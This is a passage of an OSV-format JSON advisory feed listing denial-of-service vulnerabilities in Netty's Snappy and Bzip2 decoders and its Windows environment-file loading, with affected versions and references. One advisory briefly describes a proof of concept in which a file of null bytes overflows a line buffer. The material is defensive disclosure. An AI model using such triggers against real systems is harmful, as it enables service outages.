"4.0.37.Final", "4.0.38.Final", "4.0.39.Final", "4.0.4.Final", "4.0.40.Final", "4.0.41.Final", "4.0.42.Final", "4.0.43.Final", "4.0.44.Final", "4.0.45.Final", "4.0.46.Final", "4.0.47.Final", "4.0.48.Final", "4.0.49.Final", "4.0.5.Final", "4.0.50.Final", "4.0.51.Final", "4.0.52.Final", "4.0.53.Final", "4.0.54.Final", "4.0.55.Final", "4.0.56.Final", "4.0.6.Final", "4.0.7.Final", "4.0.8.Final", "4.0.9.Final", "4.1.0.Beta1", "4.1.0.Beta2", "4.1.0.Beta3", "4.1.0.Beta4", "4.1.0.Beta5", "4.1.0.Beta6", "4.1.0.Beta7", "4.1.0.Beta8", "4.1.0.CR1", "4.1.0.CR2", "4.1.0.CR3", "4.1.0.CR4", "4.1.0.CR5", "4.1.0.CR6", "4.1.0.CR7", "4.1.0.Final", "4.1.1.Final", "4.1.10.Final", "4.1.100.Final", "4.1.101.Final", "4.1.102.Final", "4.1.103.Final", "4.1.104.Final", "4.1.105.Final", "4.1.106.Final", "4.1.107.Final", "4.1.108.Final", "4.1.109.Final", "4.1.11.Final", "4.1.110.Final", "4.1.111.Final", "4.1.112.Final", "4.1.113.Final", "4.1.114.Final", "4.1.115.Final", "4.1.116.Final", "4.1.117.Final", "4.1.118.Final", "4.1.119.Final", "4.1.12.Final", 
"4.1.120.Final", "4.1.121.Final", "4.1.122.Final", "4.1.123.Final", "4.1.124.Final", "4.1.13.Final", "4.1.14.Final", "4.1.15.Final", "4.1.16.Final", "4.1.17.Final", "4.1.18.Final", "4.1.19.Final", "4.1.2.Final", "4.1.20.Final", "4.1.21.Final", "4.1.22.Final", "4.1.23.Final", "4.1.24.Final", "4.1.25.Final", "4.1.26.Final", "4.1.27.Final", "4.1.28.Final", "4.1.29.Final", "4.1.3.Final", "4.1.30.Final", "4.1.31.Final", "4.1.32.Final", "4.1.33.Final", "4.1.34.Final", "4.1.35.Final", "4.1.36.Final", "4.1.37.Final", "4.1.38.Final", "4.1.39.Final", "4.1.4.Final", "4.1.40.Final", "4.1.41.Final", "4.1.42.Final", "4.1.43.Final", "4.1.44.Final", "4.1.45.Final", "4.1.46.Final", "4.1.47.Final", "4.1.48.Final", "4.1.49.Final", "4.1.5.Final", "4.1.50.Final", "4.1.51.Final", "4.1.52.Final", "4.1.53.Final", "4.1.54.Final", "4.1.55.Final", "4.1.56.Final", "4.1.57.Final", "4.1.58.Final", "4.1.59.Final", "4.1.6.Final", "4.1.60.Final", "4.1.61.Final", "4.1.62.Final", "4.1.63.Final", "4.1.64.Final", "4.1.65.Final", "4.1.66.Final", "4.1.67.Final", "4.1.68.Final", "4.1.69.Final", "4.1.7.Final", "4.1.70.Final", "4.1.71.Final", "4.1.72.Final", "4.1.73.Final", "4.1.74.Final", "4.1.75.Final", "4.1.76.Final", "4.1.77.Final", "4.1.78.Final", "4.1.79.Final", "4.1.8.Final", "4.1.80.Final", "4.1.81.Final", "4.1.82.Final", "4.1.83.Final", "4.1.84.Final", "4.1.85.Final", "4.1.86.Final", "4.1.87.Final", "4.1.88.Final", "4.1.89.Final", "4.1.9.Final", "4.1.90.Final", "4.1.91.Final", "4.1.92.Final", "4.1.93.Final", "4.1.94.Final", "4.1.95.Final", "4.1.96.Final", "4.1.97.Final", "4.1.98.Final", "4.1.99.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/09/GHSA-3p8m-j85q-pgmj/GHSA-3p8m-j85q-pgmj.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/netty/netty/security/advisories/GHSA-3p8m-j85q-pgmj" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58057" }, { "type": "WEB", "url": 
"https://github.com/netty/netty/commit/9d804c54ce962408ae6418255a83a13924f7145d" }, { "type": "PACKAGE", "url": "https://github.com/netty/netty" } ], "database_specific": { "cwe_ids": [ "CWE-409" ], "github_reviewed": true, "github_reviewed_at": "2025-09-03T18:00:55Z", "nvd_published_at": "2025-09-04T10:42:32Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-9vjp-v76f-g363", "published": "2021-09-09T17:11:31Z", "modified": "2024-03-11T05:32:25.452063Z", "aliases": [ "CVE-2021-37137" ], "related": [ "CGA-rmxq-xv79-3xfc", "CVE-2021-37137" ], "summary": "SnappyFrameDecoder doesn't restrict chunk length and may buffer skippable chunks in an unnecessary way", "details": "### Impact\nThe Snappy frame decoder function doesn't restrict the chunk length, which may lead to excessive memory usage. Besides this, it may also buffer reserved skippable chunks until the whole chunk has been received, which may lead to excessive memory usage as well.\n\nThis vulnerability can be triggered by supplying malicious input that decompresses to a very big size (via a network stream or a file) or by sending a huge skippable chunk.\n\n### Impact\n\nAll users of SnappyFrameDecoder are affected, and so the application may be at risk of a DoS attack due to excessive memory usage.\n\n### References\nhttps://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L79\nhttps://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L171\nhttps://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L185", "affected": [ { "package": { "name": "io.netty:netty-codec", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-codec" }, "ranges": [ { "type": "ECOSYSTEM", 
"events": [ { "introduced": "4.0.0" }, { "fixed": "4.1.68.Final" } ] } ], "versions": [ "4.0.0.Final", "4.0.1.Final", "4.0.10.Final", "4.0.11.Final", "4.0.12.Final", "4.0.13.Final", "4.0.14.Beta1", "4.0.14.Final", "4.0.15.Final", "4.0.16.Final", "4.0.17.Final", "4.0.18.Final", "4.0.19.Final", "4.0.2.Final", "4.0.20.Final", "4.0.21.Final", "4.0.22.Final", "4.0.23.Final", "4.0.24.Final", "4.0.25.Final", "4.0.26.Final", "4.0.27.Final", "4.0.28.Final", "4.0.29.Final", "4.0.3.Final", "4.0.30.Final", "4.0.31.Final", "4.0.32.Final", "4.0.33.Final", "4.0.34.Final", "4.0.35.Final", "4.0.36.Final", "4.0.37.Final", "4.0.38.Final", "4.0.39.Final", "4.0.4.Final", "4.0.40.Final", "4.0.41.Final", "4.0.42.Final", "4.0.43.Final", "4.0.44.Final", "4.0.45.Final", "4.0.46.Final", "4.0.47.Final", "4.0.48.Final", "4.0.49.Final", "4.0.5.Final", "4.0.50.Final", "4.0.51.Final", "4.0.52.Final", "4.0.53.Final", "4.0.54.Final", "4.0.55.Final", "4.0.56.Final", "4.0.6.Final", "4.0.7.Final", "4.0.8.Final", "4.0.9.Final", "4.1.0.Beta1", "4.1.0.Beta2", "4.1.0.Beta3", "4.1.0.Beta4", "4.1.0.Beta5", "4.1.0.Beta6", "4.1.0.Beta7", "4.1.0.Beta8", "4.1.0.CR1", "4.1.0.CR2", "4.1.0.CR3", "4.1.0.CR4", "4.1.0.CR5", "4.1.0.CR6", "4.1.0.CR7", "4.1.0.Final", "4.1.1.Final", "4.1.10.Final", "4.1.11.Final", "4.1.12.Final", "4.1.13.Final", "4.1.14.Final", "4.1.15.Final", "4.1.16.Final", "4.1.17.Final", "4.1.18.Final", "4.1.19.Final", "4.1.2.Final", "4.1.20.Final", "4.1.21.Final", "4.1.22.Final", "4.1.23.Final", "4.1.24.Final", "4.1.25.Final", "4.1.26.Final", "4.1.27.Final", "4.1.28.Final", "4.1.29.Final", "4.1.3.Final", "4.1.30.Final", "4.1.31.Final", "4.1.32.Final", "4.1.33.Final", "4.1.34.Final", "4.1.35.Final", "4.1.36.Final", "4.1.37.Final", "4.1.38.Final", "4.1.39.Final", "4.1.4.Final", "4.1.40.Final", "4.1.41.Final", "4.1.42.Final", "4.1.43.Final", "4.1.44.Final", "4.1.45.Final", "4.1.46.Final", "4.1.47.Final", "4.1.48.Final", "4.1.49.Final", "4.1.5.Final", "4.1.50.Final", "4.1.51.Final", "4.1.52.Final", 
"4.1.53.Final", "4.1.54.Final", "4.1.55.Final", "4.1.56.Final", "4.1.57.Final", "4.1.58.Final", "4.1.59.Final", "4.1.6.Final", "4.1.60.Final", "4.1.61.Final", "4.1.62.Final", "4.1.63.Final", "4.1.64.Final", "4.1.65.Final", "4.1.66.Final", "4.1.67.Final", "4.1.7.Final", "4.1.8.Final", "4.1.9.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/09/GHSA-9vjp-v76f-g363/GHSA-9vjp-v76f-g363.json" } }, { "package": { "name": "org.jboss.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/org.jboss.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "3.0.0.CR1", "3.0.0.CR2", "3.0.0.CR3", "3.0.0.CR4", "3.0.0.CR5", "3.0.0.GA", "3.0.1.GA", "3.0.2.GA", "3.1.0.ALPHA1", "3.1.0.ALPHA2", "3.1.0.ALPHA3", "3.1.0.ALPHA4", "3.1.0.BETA1", "3.1.0.BETA2", "3.1.0.BETA3", "3.1.0.CR1", "3.1.0.GA", "3.1.1.GA", "3.1.2.GA", "3.1.3.GA", "3.1.4.GA", "3.1.5.GA", "3.2.0.ALPHA1", "3.2.0.ALPHA2", "3.2.0.ALPHA3", "3.2.0.ALPHA4", "3.2.0.BETA1", "3.2.0.CR1", "3.2.0.Final", "3.2.1.Final", "3.2.10.Final", "3.2.2.Final", "3.2.3.Final", "3.2.4.Final", "3.2.5.Final", "3.2.6.Final", "3.2.7.Final", "3.2.8.Final", "3.2.9.Final" ], "database_specific": { "last_known_affected_version_range": "\u003c 4.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/09/GHSA-9vjp-v76f-g363/GHSA-9vjp-v76f-g363.json" } }, { "package": { "name": "io.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "3.10.0.Final", "3.10.1.Final", "3.10.2.Final", "3.10.3.Final", "3.10.4.Final", "3.10.5.Final", "3.10.6.Final", "3.3.0.Final", "3.3.1.Final", "3.4.0.Alpha1", "3.4.0.Alpha2", "3.4.0.Beta1", "3.4.0.Final", "3.4.1.Final", "3.4.2.Final", "3.4.3.Final", "3.4.4.Final", "3.4.5.Final", "3.4.6.Final", "3.5.0.Beta1", "3.5.0.Final", "3.5.1.Final", 
"3.5.10.Final", "3.5.11.Final", "3.5.12.Final", "3.5.13.Final", "3.5.2.Final", "3.5.3.Final", "3.5.4.Final", "3.5.5.Final", "3.5.6.Final", "3.5.7.Final", "3.5.8.Final", "3.5.9.Final", "3.6.0.Beta1", "3.6.0.Final", "3.6.1.Final", "3.6.10.Final", "3.6.2.Final", "3.6.3.Final", "3.6.4.Final", "3.6.5.Final", "3.6.6.Final", "3.6.7.Final", "3.6.8.Final", "3.6.9.Final", "3.7.0.Final", "3.7.1.Final", "3.8.0.Final", "3.8.1.Final", "3.8.2.Final", "3.8.3.Final", "3.9.0.Final", "3.9.1.1.Final", "3.9.1.Final", "3.9.2.Final", "3.9.3.Final", "3.9.4.Final", "3.9.5.Final", "3.9.6.Final", "3.9.7.Final", "3.9.8.Final", "3.9.9.Final", "4.0.0.Alpha1", "4.0.0.Alpha2", "4.0.0.Alpha3", "4.0.0.Alpha4", "4.0.0.Alpha5", "4.0.0.Alpha6", "4.0.0.Alpha7", "4.0.0.Alpha8" ], "database_specific": { "last_known_affected_version_range": "\u003c 4.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/09/GHSA-9vjp-v76f-g363/GHSA-9vjp-v76f-g363.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/netty/netty/security/advisories/GHSA-9vjp-v76f-g363" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37137" }, { "type": "WEB", "url": "https://github.com/netty/netty/commit/6da4956b31023ae967451e1d94ff51a746a9194f" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5316" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20220210-0012" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00008.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfb2bf8597e53364ccab212fbcbb2a4e9f0a9e1429b1dc08023c6868e@%3Cdev.tinkerpop.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/rd262f59b1586a108e320e5c966feeafbb1b8cdc96965debc7cc10b16@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r75490c61c2cb7b6ae2c81238fd52ae13636c60435abcd732d41531a0@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5e05eba32476c580412f9fbdfc9b8782d5b40558018ac4ac07192a04@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5406eaf3b07577d233b9f07cfc8f26e28369e6bab5edfcab41f28abb@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r06a145c9bd41a7344da242cef07977b24abe3349161ede948e30913d@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://github.com/netty/netty/blob/4.1/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L79" }, { "type": "WEB", "url": "https://github.com/netty/netty/blob/4.1/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L185" }, { "type": "WEB", "url": "https://github.com/netty/netty/blob/4.1/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L171" }, { "type": "PACKAGE", "url": "https://github.com/netty/netty" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2021-09-09T14:44:10Z", "nvd_published_at": "2021-10-19T15:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-grg4-wf29-r9vv", "published": "2021-09-09T17:11:21Z", "modified": "2024-03-11T05:19:43.929590Z", "aliases": [ "CVE-2021-37136" ], "related": [ "CGA-xpcq-6m7h-f8qc", "CVE-2021-37136" ], "summary": "Bzip2Decoder doesn't allow setting size restrictions for decompressed data", "details": "### Impact\nThe Bzip2 decompression decoder function doesn't allow setting size restrictions on the decompressed 
output data (which affects the allocation size used during decompression).\n\n\nAll users of Bzip2Decoder are affected. The malicious input can trigger an OOME and so a DoS attack\n\n### Workarounds\nNo workarounds other than not using the `Bzip2Decoder`\n\n### References\n\nRelevant code areas:\n\nhttps://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L80\nhttps://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L294\nhttps://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L305", "affected": [ { "package": { "name": "io.netty:netty-codec", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-codec" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.1.68.Final" } ] } ], "versions": [ "4.0.0.Alpha1", "4.0.0.Alpha2", "4.0.0.Alpha3", "4.0.0.Alpha4", "4.0.0.Alpha5", "4.0.0.Alpha6", "4.0.0.Alpha7", "4.0.0.Alpha8", "4.0.0.Beta1", "4.0.0.Beta2", "4.0.0.Beta3", "4.0.0.CR1", "4.0.0.CR2", "4.0.0.CR3", "4.0.0.CR4", "4.0.0.CR5", "4.0.0.CR6", "4.0.0.CR7", "4.0.0.CR8", "4.0.0.CR9", "4.0.0.Final", "4.0.1.Final", "4.0.10.Final", "4.0.11.Final", "4.0.12.Final", "4.0.13.Final", "4.0.14.Beta1", "4.0.14.Final", "4.0.15.Final", "4.0.16.Final", "4.0.17.Final", "4.0.18.Final", "4.0.19.Final", "4.0.2.Final", "4.0.20.Final", "4.0.21.Final", "4.0.22.Final", "4.0.23.Final", "4.0.24.Final", "4.0.25.Final", "4.0.26.Final", "4.0.27.Final", "4.0.28.Final", "4.0.29.Final", "4.0.3.Final", "4.0.30.Final", "4.0.31.Final", "4.0.32.Final", "4.0.33.Final", "4.0.34.Final", "4.0.35.Final", "4.0.36.Final", "4.0.37.Final", "4.0.38.Final", "4.0.39.Final", "4.0.4.Final", "4.0.40.Final", "4.0.41.Final", "4.0.42.Final", "4.0.43.Final", "4.0.44.Final", "4.0.45.Final", "4.0.46.Final", "4.0.47.Final", "4.0.48.Final", "4.0.49.Final", "4.0.5.Final", "4.0.50.Final", 
"4.0.51.Final", "4.0.52.Final", "4.0.53.Final", "4.0.54.Final", "4.0.55.Final", "4.0.56.Final", "4.0.6.Final", "4.0.7.Final", "4.0.8.Final", "4.0.9.Final", "4.1.0.Beta1", "4.1.0.Beta2", "4.1.0.Beta3", "4.1.0.Beta4", "4.1.0.Beta5", "4.1.0.Beta6", "4.1.0.Beta7", "4.1.0.Beta8", "4.1.0.CR1", "4.1.0.CR2", "4.1.0.CR3", "4.1.0.CR4", "4.1.0.CR5", "4.1.0.CR6", "4.1.0.CR7", "4.1.0.Final", "4.1.1.Final", "4.1.10.Final", "4.1.11.Final", "4.1.12.Final", "4.1.13.Final", "4.1.14.Final", "4.1.15.Final", "4.1.16.Final", "4.1.17.Final", "4.1.18.Final", "4.1.19.Final", "4.1.2.Final", "4.1.20.Final", "4.1.21.Final", "4.1.22.Final", "4.1.23.Final", "4.1.24.Final", "4.1.25.Final", "4.1.26.Final", "4.1.27.Final", "4.1.28.Final", "4.1.29.Final", "4.1.3.Final", "4.1.30.Final", "4.1.31.Final", "4.1.32.Final", "4.1.33.Final", "4.1.34.Final", "4.1.35.Final", "4.1.36.Final", "4.1.37.Final", "4.1.38.Final", "4.1.39.Final", "4.1.4.Final", "4.1.40.Final", "4.1.41.Final", "4.1.42.Final", "4.1.43.Final", "4.1.44.Final", "4.1.45.Final", "4.1.46.Final", "4.1.47.Final", "4.1.48.Final", "4.1.49.Final", "4.1.5.Final", "4.1.50.Final", "4.1.51.Final", "4.1.52.Final", "4.1.53.Final", "4.1.54.Final", "4.1.55.Final", "4.1.56.Final", "4.1.57.Final", "4.1.58.Final", "4.1.59.Final", "4.1.6.Final", "4.1.60.Final", "4.1.61.Final", "4.1.62.Final", "4.1.63.Final", "4.1.64.Final", "4.1.65.Final", "4.1.66.Final", "4.1.67.Final", "4.1.7.Final", "4.1.8.Final", "4.1.9.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/09/GHSA-grg4-wf29-r9vv/GHSA-grg4-wf29-r9vv.json" } }, { "package": { "name": "org.jboss.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/org.jboss.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "3.0.0.CR1", "3.0.0.CR2", "3.0.0.CR3", "3.0.0.CR4", "3.0.0.CR5", "3.0.0.GA", "3.0.1.GA", "3.0.2.GA", "3.1.0.ALPHA1", "3.1.0.ALPHA2", "3.1.0.ALPHA3", "3.1.0.ALPHA4", 
"3.1.0.BETA1", "3.1.0.BETA2", "3.1.0.BETA3", "3.1.0.CR1", "3.1.0.GA", "3.1.1.GA", "3.1.2.GA", "3.1.3.GA", "3.1.4.GA", "3.1.5.GA", "3.2.0.ALPHA1", "3.2.0.ALPHA2", "3.2.0.ALPHA3", "3.2.0.ALPHA4", "3.2.0.BETA1", "3.2.0.CR1", "3.2.0.Final", "3.2.1.Final", "3.2.10.Final", "3.2.2.Final", "3.2.3.Final", "3.2.4.Final", "3.2.5.Final", "3.2.6.Final", "3.2.7.Final", "3.2.8.Final", "3.2.9.Final" ], "database_specific": { "last_known_affected_version_range": "\u003c 4.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/09/GHSA-grg4-wf29-r9vv/GHSA-grg4-wf29-r9vv.json" } }, { "package": { "name": "io.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "3.10.0.Final", "3.10.1.Final", "3.10.2.Final", "3.10.3.Final", "3.10.4.Final", "3.10.5.Final", "3.10.6.Final", "3.3.0.Final", "3.3.1.Final", "3.4.0.Alpha1", "3.4.0.Alpha2", "3.4.0.Beta1", "3.4.0.Final", "3.4.1.Final", "3.4.2.Final", "3.4.3.Final", "3.4.4.Final", "3.4.5.Final", "3.4.6.Final", "3.5.0.Beta1", "3.5.0.Final", "3.5.1.Final", "3.5.10.Final", "3.5.11.Final", "3.5.12.Final", "3.5.13.Final", "3.5.2.Final", "3.5.3.Final", "3.5.4.Final", "3.5.5.Final", "3.5.6.Final", "3.5.7.Final", "3.5.8.Final", "3.5.9.Final", "3.6.0.Beta1", "3.6.0.Final", "3.6.1.Final", "3.6.10.Final", "3.6.2.Final", "3.6.3.Final", "3.6.4.Final", "3.6.5.Final", "3.6.6.Final", "3.6.7.Final", "3.6.8.Final", "3.6.9.Final", "3.7.0.Final", "3.7.1.Final", "3.8.0.Final", "3.8.1.Final", "3.8.2.Final", "3.8.3.Final", "3.9.0.Final", "3.9.1.1.Final", "3.9.1.Final", "3.9.2.Final", "3.9.3.Final", "3.9.4.Final", "3.9.5.Final", "3.9.6.Final", "3.9.7.Final", "3.9.8.Final", "3.9.9.Final", "4.0.0.Alpha1", "4.0.0.Alpha2", "4.0.0.Alpha3", "4.0.0.Alpha4", "4.0.0.Alpha5", "4.0.0.Alpha6", "4.0.0.Alpha7", "4.0.0.Alpha8" ], "database_specific": { "last_known_affected_version_range": "\u003c 4.0.0", "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/09/GHSA-grg4-wf29-r9vv/GHSA-grg4-wf29-r9vv.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/netty/netty/security/advisories/GHSA-grg4-wf29-r9vv" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37136" }, { "type": "WEB", "url": "https://github.com/netty/netty/commit/41d3d61a61608f2223bb364955ab2045dd5e4020" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5316" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20220210-0012" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00008.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfb2bf8597e53364ccab212fbcbb2a4e9f0a9e1429b1dc08023c6868e@%3Cdev.tinkerpop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd262f59b1586a108e320e5c966feeafbb1b8cdc96965debc7cc10b16@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r75490c61c2cb7b6ae2c81238fd52ae13636c60435abcd732d41531a0@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5e05eba32476c580412f9fbdfc9b8782d5b40558018ac4ac07192a04@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5406eaf3b07577d233b9f07cfc8f26e28369e6bab5edfcab41f28abb@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r06a145c9bd41a7344da242cef07977b24abe3349161ede948e30913d@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": 
"https://github.com/netty/netty/blob/4.1/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L80" }, { "type": "WEB", "url": "https://github.com/netty/netty/blob/4.1/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L305" }, { "type": "WEB", "url": "https://github.com/netty/netty/blob/4.1/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L294" }, { "type": "PACKAGE", "url": "https://github.com/netty/netty" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2021-09-09T14:36:56Z", "nvd_published_at": "2021-10-19T15:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-389x-839f-4rhx", "published": "2025-02-10T18:14:47Z", "modified": "2025-03-19T15:06:40.575662Z", "aliases": [ "CVE-2025-25193" ], "related": [ "CGA-3vm3-626v-4449", "CGA-ffqr-c78c-j6h2", "CGA-rp29-pprx-g77p", "CGA-xw98-j5vj-f79x", "CVE-2025-25193" ], "summary": "Denial of Service attack on windows app using Netty", "details": "### Summary\nAn unsafe reading of environment file could potentially cause a denial of service in Netty.\nWhen loaded on an Windows application, Netty attemps to load a file that does not exist. 
If an attacker creates such a large file, the Netty application crash.\n\n### Details\nA similar issue was previously reported in https://github.com/netty/netty/security/advisories/GHSA-xq3w-v528-46rv\nThis issue was fixed, but the fix was incomplete in that null-bytes were not counted against the input limit.\n\n\n### PoC\nThe PoC is the same as for https://github.com/netty/netty/security/advisories/GHSA-xq3w-v528-46rv with the detail that the file should only contain null-bytes; 0x00.\nWhen the null-bytes are encountered by the `InputStreamReader`, it will issue replacement characters in its charset decoding, which will fill up the line-buffer in the `BufferedReader.readLine()`, because the replacement character is not a line-break character.\n\n### Impact\nImpact is the same as https://github.com/netty/netty/security/advisories/GHSA-xq3w-v528-46rv", "affected": [ { "package": { "name": "io.netty:netty-common", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.1.118.Final" } ] } ], "versions": [ "4.0.0.Alpha1", "4.0.0.Alpha2", "4.0.0.Alpha3", "4.0.0.Alpha4", "4.0.0.Alpha5", "4.0.0.Alpha6", "4.0.0.Alpha7", "4.0.0.Alpha8", "4.0.0.Beta1", "4.0.0.Beta2", "4.0.0.Beta3", "4.0.0.CR1", "4.0.0.CR2", "4.0.0.CR3", "4.0.0.CR4", "4.0.0.CR5", "4.0.0.CR6", "4.0.0.CR7", "4.0.0.CR8", "4.0.0.CR9", "4.0.0.Final", "4.0.1.Final", "4.0.10.Final", "4.0.11.Final", "4.0.12.Final", "4.0.13.Final", "4.0.14.Beta1", "4.0.14.Final", "4.0.15.Final", "4.0.16.Final", "4.0.17.Final", "4.0.18.Final", "4.0.19.Final", "4.0.2.Final", "4.0.20.Final", "4.0.21.Final", "4.0.22.Final", "4.0.23.Final", "4.0.24.Final", "4.0.25.Final", "4.0.26.Final", "4.0.27.Final", "4.0.28.Final", "4.0.29.Final", "4.0.3.Final", "4.0.30.Final", "4.0.31.Final", "4.0.32.Final", "4.0.33.Final", "4.0.34.Final", "4.0.35.Final", "4.0.36.Final", "4.0.37.Final", "4.0.38.Final", "4.0.39.Final", "4.0.4.Final", "4.0.40.Final", 
"4.0.41.Final", "4.0.42.Final", "4.0.43.Final", "4.0.44.Final", "4.0.45.Final", "4.0.46.Final", "4.0.47.Final", "4.0.48.Final", "4.0.49.Final", "4.0.5.Final", "4.0.50.Final", "4.0.51.Final", "4.0.52.Final", "4.0.53.Final", "4.0.54.Final", "4.0.55.Final", "4.0.56.Final", "4.0.6.Final", "4.0.7.Final", "4.0.8.Final", "4.0.9.Final", "4.1.0.Beta1", "4.1.0.Beta2", "4.1.0.Beta3", "4.1.0.Beta4", "4.1.0.Beta5", "4.1.0.Beta6", "4.1.0.Beta7", "4.1.0.Beta8", "4.1.0.CR1", "4.1.0.CR2", "4.1.0.CR3", "4.1.0.CR4", "4.1.0.CR5", "4.1.0.CR6", "4.1.0.CR7", "4.1.0.Final", "4.1.1.Final", "4.1.10.Final", "4.1.100.Final", "4.1.101.Final", "4.1.102.Final", "4.1.103.Final", "4.1.104.Final", "4.1.105.Final", "4.1.106.Final", "4.1.107.Final", "4.1.108.Final", "4.1.109.Final", "4.1.11.Final", "4.1.110.Final", "4.1.111.Final", "4.1.112.Final", "4.1.113.Final", "4.1.114.Final", "4.1.115.Final", "4.1.116.Final", "4.1.117.Final", "4.1.12.Final", "4.1.13.Final", "4.1.14.Final", "4.1.15.Final", "4.1.16.Final", "4.1.17.Final", "4.1.18.Final", "4.1.19.Final", "4.1.2.Final", "4.1.20.Final", "4.1.21.Final", "4.1.22.Final", "4.1.23.Final", "4.1.24.Final", "4.1.25.Final", "4.1.26.Final", "4.1.27.Final", "4.1.28.Final", "4.1.29.Final", "4.1.3.Final", "4.1.30.Final", "4.1.31.Final", "4.1.32.Final", "4.1.33.Final", "4.1.34.Final", 